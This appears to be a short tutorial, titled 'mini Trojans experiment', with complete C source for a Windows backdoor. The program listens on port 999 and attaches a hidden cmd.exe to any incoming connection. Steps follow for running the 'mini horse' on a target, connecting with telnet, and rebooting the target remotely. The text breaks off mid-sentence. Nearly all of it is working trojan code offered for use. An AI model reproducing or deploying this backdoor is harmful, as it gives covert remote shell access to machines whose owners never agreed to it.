5, mini Trojans experiment

#pragma comment(lib,"ws2_32.lib")//需要用到网络功能，所以启用windows套接字动态链接库
#include <WinSock2.h>//Windows套接字头文件
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>

#define MASTERPORT 999//定义常量，后门端口为999端口

int main()
{
	WSADATA WSADa;
	sockaddr_in SockAddrIn;
	SOCKET CSocket,SSocket;
	int iAddrSize;


	PROCESS_INFORMATION ProcessInfo;//创建新的进程
	STARTUPINFO StartupInfo;//指定新进程启动信息
	char szCMDPath[255];

	//初始化数据---清0
	ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
	ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
	ZeroMemory(&WSADa,sizeof(WSADATA));
	//获得cmd环境变量
	GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
	//加载ws2_32.dll
	WSAStartup(0x0202,&WSADa);
	//设定本地信息
	SockAddrIn.sin_family=AF_INET;
	SockAddrIn.sin_addr.s_addr=INADDR_ANY;
	SockAddrIn.sin_port=htons(MASTERPORT);
	CSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
	//绑定协议
	bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));
	//监听
	listen(CSocket,1);
	iAddrSize=sizeof(SockAddrIn);
	//客户端连接Socket
	SSocket=accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);

	//启动cmd进程，并重定向输入输出
	StartupInfo.cb=sizeof(STARTUPINFO);//设置Startup的大小
	StartupInfo.wShowWindow=SW_HIDE;//将窗口隐藏
	//StartupInfo.wShowWindow=TRUE;
	StartupInfo.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;//新增一个句柄，并利用这个句柄跟套接字相连
	//StartupInfo.dwFlags=STARTF_USESHOWWINDOW;

	//利用套接字作为命令窗口的输入和输出
	StartupInfo.hStdInput=(HANDLE)SSocket;
	StartupInfo.hStdOutput=(HANDLE)SSocket;
	StartupInfo.hStdError=(HANDLE)SSocket;
	/*
	CreateProcess();
	LPCTSTR lpApplicationName, // 应用程序名称  
  　LPTSTR lpCommandLine, // 命令行字符串  
  　LPSECURITY_ATTRIBUTES lpProcessAttributes, // 进程的安全属性  
  　LPSECURITY_ATTRIBUTES lpThreadAttributes, // 线程的安全属性  
  　BOOL bInheritHandles, // 是否继承父进程的属性  
  　DWORD dwCreationFlags, // 创建标志  
  　LPVOID lpEnvironment, // 指向新的环境块的指针  
  　LPCTSTR lpCurrentDirectory, // 指向当前目录名的指针  
  　LPSTARTUPINFO lpStartupInfo, // 传递给新进程的信息  
  　LPPROCESS_INFORMATION lpProcessInformation // 新进程返回的信息
	*/
	CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
	//等待进程结束
	WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
	//关闭资源
	CloseHandle(ProcessInfo.hProcess);
	CloseHandle(ProcessInfo.hThread);
	closesocket(CSocket);
	closesocket(SSocket);
	WSACleanup;

	return 0;
}

1. The target machine running mini horse

2. The machine: Telnet 192.168.31.49 999, you can enter the target machine

3.shutdown -r reboot the target machine to let